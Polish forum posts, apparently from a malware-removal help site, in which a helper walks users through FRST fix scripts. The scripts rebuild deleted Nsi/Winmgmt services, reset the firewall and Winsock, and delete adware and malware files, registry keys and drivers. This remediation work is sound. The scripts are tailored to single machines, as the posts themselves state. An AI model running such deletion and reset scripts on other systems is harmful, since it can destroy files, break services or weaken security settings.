Wszystko zgodnie z planem wykonane w skrypcie, internet naprawiony. Na koniec: 1. Przez SHIFT+DEL (moja Kosz) skasuj folder C:\FRST oraz drugi folder z Pulpitu. 2. Do aktualizacji poniższe programy. Wytyczne w przyklejonym: KLIK. Wszystkie stare wersje Java do deinstalacji. ==================== Installed Programs ====================== Adobe Shockwave Player 12.1 (HKLM-x32\...\{07C5D2FF-2AA8-46D1-B9E8-BACCD34C8E01}) (Version: 12.1.4.154 - Adobe Systems, Inc) FileZilla Client 3.9.0.6 (HKLM-x32\...\FileZilla Client) (Version: 3.9.0.6 - Tim Kosse) Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation) Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation) Java SE Development Kit 8 Update 74 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180740}) (Version: 8.0.740.2 - Oracle Corporation)

Brak sieci wynika z usunięcia usług Nsi i Winmgmt. Prócz rekonstrukcji tych usług, jeszcze drobne inne poprawki są tu wymagane. 1. Obecnie jako domyślna przeglądarka jest ustawione "Chrome", które nie istnieje w systemie. Ustaw Internet Explorer jako domyślną przeglądarkę. 2. Pobierz SetACL (na spodzie strony klik w "Administrators: Download the EXE version of SetACL 3.0.6 for 32-bit and 64-bit Windows"). Rozpakuj pobraną paczkę i z folderu x64 przekopiuj plik SetACL.exe do katalogu C:\Windows. 3. Otwórz Notatnik i wklej w nim: "machine\SYSTEM\CurrentControlSet\Services\nsi",4,"O:BA" "machine\SYSTEM\CurrentControlSet\Services\nsi\Parameters",4,"O:BAD:PAI(A;;KA;;;BA)(A;CIIO;GA;;;BA)(A;;KA;;;SY)(A;CIIO;GA;;;SY)(A;;CCLCSWRPRC;;;S-1-5-80-2310782386-4237065203-3688974353-390202159-3511571085)" Plik zapisz pod nazwą fix.txt na Pulpicie. Zarówno nazwa pliku jak i lokalizacja są obligatoryjne, gdyż te parametry zostaną użyte w skrypcie przywracającym uprawnienia podanym poniżej. 4. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: StartRegedit: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\nsi] "DisplayName"="@%SystemRoot%\\system32\\nsisvc.dll,-200" "ImagePath"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,00,\ 74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\ 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\ 6b,00,20,00,4c,00,6f,00,63,00,61,00,6c,00,53,00,65,00,72,00,76,00,69,00,63,\ 00,65,00,00,00 "Description"="@%SystemRoot%\\system32\\nsisvc.dll,-201" "ObjectName"="NT Authority\\LocalService" "ErrorControl"=dword:00000001 "Start"=dword:00000002 "Type"=dword:00000020 "DependOnService"=hex(7):6e,00,73,00,69,00,70,00,72,00,6f,00,78,00,79,00,00,00,\ 00,00 "ServiceSidType"=dword:00000001 "RequiredPrivileges"=hex(7):53,00,65,00,43,00,72,00,65,00,61,00,74,00,65,00,47,\ 00,6c,00,6f,00,62,00,61,00,6c,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,\ 67,00,65,00,00,00,53,00,65,00,49,00,6d,00,70,00,65,00,72,00,73,00,6f,00,6e,\ 00,61,00,74,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,\ 00,00,00,00 "FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,c0,d4,01,00,01,00,00,00,e0,93,04,00,00,00,00,00,00,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\nsi\Parameters] "ServiceDll"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,\ 00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\ 6e,00,73,00,69,00,73,00,76,00,63,00,2e,00,64,00,6c,00,6c,00,00,00 "ServiceDllUnloadOnStop"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmgmt] "DisplayName"="@%Systemroot%\\system32\\wbem\\wmisvc.dll,-205" "ImagePath"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,00,\ 74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\ 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\ 6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00 "Description"="@%Systemroot%\\system32\\wbem\\wmisvc.dll,-204" "ObjectName"="localSystem" "ErrorControl"=dword:00000000 "Start"=dword:00000002 "Type"=dword:00000020 "DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00 "ServiceSidType"=dword:00000001 "FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,c0,d4,01,00,01,00,00,00,e0,93,04,00,00,00,00,00,00,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmgmt\Parameters] "ServiceDllUnloadOnStop"=dword:00000001 "ServiceDll"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\ 00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\ 77,00,62,00,65,00,6d,00,5c,00,57,00,4d,00,49,00,73,00,76,00,63,00,2e,00,64,\ 00,6c,00,6c,00,00,00 "ServiceMain"="ServiceMain" EndRegedit: StartBatch: SetACL -on "HKLM\SYSTEM\CurrentControlSet\Services\nsi" -ot reg -actn restore -bckp C:\Users\fundowic\Desktop\fix.txt netsh advfirewall reset del /q C:\WINDOWS\SysWOW64\3333333 del /q C:\WINDOWS\SysWOW64\33 del /q C:\WINDOWS\SysWOW64\1111111 del /q C:\WINDOWS\SysWOW64\1111 del /q C:\WINDOWS\SysWOW64\11 del /q C:\WINDOWS\SysWOW64\00 EndBatch: DeleteKey: HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\4fd88af7_0 DeleteKey: HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\7909d0b6_0 DeleteValue: HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache| C:\Program Files (x86)\Bagsarah\Application\chrome.exe DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders|C:\Program Files (x86)\Mozilla Firefox\plugins DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders|C:\Program Files (x86)\Mozilla Firefox RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Quarantine RemoveDirectory: C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705} RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip RemoveDirectory: C:\Program Files (x86)\BiaoJi RemoveDirectory: C:\Program Files (x86)\mozilla firefox RemoveDirectory: C:\Users\fundowic\AppData\LocalLow\Mozilla RemoveDirectory: C:\WINDOWS\system32\log Reboot: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.

Log z FRST nie jest wiarygodny (i część danych nie jest nawet wykryta), użyty niezgodny bitowo dysk startowy: UWAGA!:=====> SYSTEM OPERACYJNY JEST TYPU X64 ALE ZOSTAŁ UŻYTY DYSK STARTOWY TYPU X86. Środowisko RE musi być w wersji 64-bit, by FRST 64-bit poprawnie wykrył dane. Poza tym, gdy już dopasujesz bity, nie odznaczaj pól filtrowanie. Masa zbędnych danych.

Na przyszłość, linki bezpośrednie wprost z Microsoft Catalog: KLIK. Nie promuję tu pobierania via serwisy pośrednie. To wszystko wskazuje, że jest uszkodzenie w komponentach systemowych uniemożliwiające instalację (obojętną metodą). Należy zdiagnozować szczegóły gdzie jest ubytek: Uruchom "Narzędzie analizy gotowości aktualizacji systemu": KLIK. Gdy narzędzie ukończy skan, skopiuj na Pulpit cały katalog C:\Windows\Logs\CBS, zapakuj do ZIP i shostuj gdzieś podając link do paczki. Nie obiecuję szybkiej analizy.

Temat zamykam, ale skomentuję na koniec. Problemem był program WindowsTM: ==================== Zainstalowane programy ====================== WindowsTM (HKLM-x32\...\WindowsTM) (Version: 1,2,60122,1018 - ) ==================== Usługi (filtrowane) ==================== R2 TMKernelHelpU; C:\WINDOWS\SysWOW64\TMKernelU.dll [470016 2016-03-11] (Smart Software, Inc.) S3 TMService; C:\Program Files (x86)\WindowsTM\TMService.exe [232448 2016-03-11] (Smart Software, Inc.) ===================== Sterowniki (filtrowane) ====================== R2 TMKernel; C:\WINDOWS\system32\drivers\TMKernel.sys [180264 2016-03-11] (Smart Software, Inc.) S2 trayhttps; \??\C:\Windows\system32\drivers\avcismmn.sys [X]

Wesołych i spokojnych Świąt dla wszystkich użytkowników fixitpc.pl!

Wszystko pomyślnie wykonane. Kroki końcowe: 1. Zastosuj DelFix. Usuń też ręcznie pobrany FRST z C:\Users\Gracjan\Downloads\Programs (DelFix nie przetwarza rekursywnie Downloads). 2. Na wszelki wypadek zmień hasła logowania, jeśli istnieje podejrzenie że któreś z nich mogło zostać przechwycone.

Pomijając usunięty przez Ciebie wpis, reszta porządków w większości wykonana. Małe poprawki: 1. Otwórz Notatnik i wklej w nim: Winsock: Catalog5 05 %SystemRoot%\system32\networkdlllsp.dll => Brak pliku RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\MATS Reboot: Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart konieczny, by zatwierdzić zmiany w Winsock. Przedstaw wynikowy fixlog.txt. 2. Uruchom Zoek. W oknie wklej: SafeZone Stable 1.51.2220.62;u Klik w Run Script. Przedstaw wynikowy log zoek-results.txt (po zmianie nazwy z *.log). Nowe skany FRST nie są już potrzebne.

To nienaturalny i szkodliwy wpis, co widać w samej konstrukcji wejścia. A co do tego, że ma sygnaturę Microsoftu: wg parametrów z Virus Total (oryginalna nazwa, suma kontrolna, data) jest to kopia 32-bitowego pliku C:\Windows\System32\WerFault.exe (i to też jest samo w sobie nienormalne). Prócz usunięcia tego wpisu przeprowadzę też dodatkowe zadania (szczątki po odinstalowanych programach Avast, Adguard, Google, HaoZip, VoodooShield, VPN). Działania do wykonania: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-4242828667-1088706184-1539738138-1001\...\Run: [Mscvin] => C:\Users\Gracjan\AppData\Roaming\Mscvin.exe [266080 2016-07-16] (Microsoft Corporation) GroupPolicyScripts: Ograniczenia GroupPolicyScripts-x32: Ograniczenia S3 HaozipVirtualCDBus; C:\WINDOWS\System32\drivers\HaoZipVirtualCDBus.sys [207336 2015-08-28] (Shanghai RuiChuang) S3 VSScanner; C:\WINDOWS\System32\DRIVERS\vsscanner.sys [29808 2016-08-18] (VoodooSoft, LLC) Task: {054636AE-BE8B-4EB2-8203-528A9322D1A4} - System32\Tasks\{2E9B0FF5-DEDA-4D3F-98A9-8676F28C7918} => pcalua.exe -a C:\Users\Gracjan\Desktop\Gothic\Diccuric_Polish.exe -d C:\Users\Gracjan\Desktop\Gothic Task: {1D45EBF2-BCA4-43FB-897A-793268FE93AE} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe Task: {1DE2F040-11DE-418B-BAEC-163265D2AF32} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Gracjan\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe Task: {556099DF-AC25-4073-99D1-66CFF97942EA} - System32\Tasks\{ABD32B63-D4E2-4DDF-99A3-4A24689C89B6} => pcalua.exe -a "D:\Gry ISO\Gothic GTX Box Team Dubbing PL v1.08j\gothic1_playerkit-1.08k.exe" -d "D:\Gry ISO\Gothic GTX Box Team Dubbing PL v1.08j" Task: {567343E4-2F0A-4150-AFA6-5718320027F5} - System32\Tasks\{6FEAD677-055F-4552-B062-E2C1F6AF6A8C} => pcalua.exe -a C:\Users\Gracjan\Desktop\Gothic\gothic1_playerkit-1.08k.exe -d C:\Users\Gracjan\Desktop\Gothic Task: {6BE92647-F69A-4DED-8F89-634DCBBAD140} - System32\Tasks\SafeZone scheduled Autoupdate 1478348518 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = DeleteKey: HKCU\Software\Mozilla DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software DisableService: Internet Manager. RunOuc CMD: netsh winsock reset C:\ProgramData\fontcacheev1.dat C:\ProgramData\mntemp C:\Program Files\Common Files\AV\avast! Antivirus C:\Program Files (x86)\Google C:\Users\Gracjan\AppData\Local\Google C:\Users\Gracjan\AppData\Roaming\1816CA7466166.ind C:\Users\Gracjan\AppData\Roaming\Mscvin.exe C:\WINDOWS\System32\drivers\HaoZipVirtualCDBus.sys C:\WINDOWS\System32\drivers\vsscanner.sys C:\Windows\System32\Tasks\AVAST Software C:\WINDOWS\SysWOW64\d3dx9_11.dll.tmp C:\WINDOWS\SysWOW64\networkdlllsp.dll C:\WINDOWS\SysWOW64\Drivers\vwifikerneldrv.sys EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Na liście zainstalowanych programów są odpadkowe ukryte wpisy po odinstalowanych przeglądarkach. Uruchom Program Install and Uninstall Troubleshooter i za jego pomocą usuń poniższe wejścia. Program musi być uruchomiony dwa razy, nie jest możliwe usunięcie więcej niż jednego wpisu w tym samym czasie. Google Update Helper (x32 Version: 1.3.21.123 - Google Inc.) Hidden SafeZone Stable 1.51.2220.62 (x32 Version: 1.51.2220.62 - Avast Software) Hidden 3. W procesach działają reklamodawcze moduły uTorrent. Sugeruję wymianę na czystego klienta qBittorrent. (BitTorrent Inc.) C:\Users\Gracjan\AppData\Roaming\uTorrent\updates\3.4.9_43388\utorrentie.exe (BitTorrent Inc.) C:\Users\Gracjan\AppData\Roaming\uTorrent\updates\3.4.9_43388\utorrentie.exe 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt. I podaj jaki plik (i skąd) uruchomiłeś, co doprowadziło do utworzenia wpisu "Mscvin".

Detekcja "VirTool:Win32/Obfuscator.XZ" nie wygląda na problem. Jeśli zaś chodzi o rozbieżność detekcji, to może są to pliki nietożsame w rozumieniu innej sumy kontrolnej MD5. O ile nie nastąpiły jakieś zmiany od ostatniego skanu FRST, teoretycznie na podstawie danych z raportu ikona powinna być, bo jest powiązany wpis startowy. Czy defekt tyczy tylko tej ikony czy innych też? HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation) To normalne zachowanie. Windows Defender (antyspyware) jest automatycznie deaktywowany, jeśli jest zainstalowany MSE (antywirus + antyspyware). W raporcie Addition możesz zobaczyć klasyfikację programów (AS = antyspyware): AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189} AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} MSE to jest edycja zastępująca mierny Windows Defender zintegrowany w systemie Windows 7. Natomiast na systemach Windows 8 i nowszych poszli dalej i wymienili programy: systemowy "Windows Defender" to najnowsza wersja "MSE" a nie Windows Defender znany z Windows 7, choć i tak jest automatycznie deaktywowany w przypadku instalacji zewnętrznego antywirusa.

Na przyszłość: proszę nie uruchamiaj opcji "Fix" więcej niż raz. Skrypt jest jednorazowego użytku i nie przetworzy ponownie tego samego. Uruchomiłeś go aż 4 razy. I jak mówiłam, Fix nie zawierał żadnym elementów MPC, gdyż FRST spod Windows go nie usunie, wyraźnie mówiłam że podam inną metodę w przypadku niepowodzenia. Kolejne instrukcje: 1. Otwórz Notatnik i wklej w nim: R2 MPCProtectService; C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [355808 2016-09-01] (DotC United Inc) R1 MPCKpt; C:\Windows\System32\DRIVERS\MPCKpt.sys [60136 2016-09-01] (DotC United Inc) C:\Program Files (x86)\MPC Cleaner C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC AdCleaner C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC Desktop C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gameforge Live\S.K.I.L.L. - Special Force 2.lnk C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Default\Desktop\Google Chrome.lnk C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\Gość\Desktop\Google Chrome.lnk C:\Users\Mati\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Mati\AppData\Roaming\MCorp C:\Users\Public\Desktop\MPC AdCleaner.lnk C:\Users\Public\Desktop\MPC Cleaner.lnk C:\Users\Public\Desktop\MPC Desktop.lnk C:\Windows\System32\drivers\MPCKpt.sys RemoveDirectory: C:\Users\Admin RemoveDirectory: C:\Users\Dominik Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt. FRST oraz plik fixlist.txt umieść na pendrive. 2. Uruchom FRST z poziomu środowiska zewnętrznego: KLIK. Klik w Fix (Napraw), na pendrive powstanie plik fixlog.txt. 3. Zaloguj się z powrotem do Windows. Zainstaluj wybraną przeglądarkę. I zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Usuwam raporty z OTL. To przestarzałe narzędzie nierozwijane od lat, które nie potrafi nawet poprawnie wykryć i przefiltrować platform nowszych niż Windows 7. Nie wspominając już o bugów i braku różnychdetekcji. Proszę dostarczyć raporty obowiązkowe z nowoczesnego FRST.

Jasiek, proszę nie usuwaj nic ręcznie, tylko podaj wyniki działań o które proszę.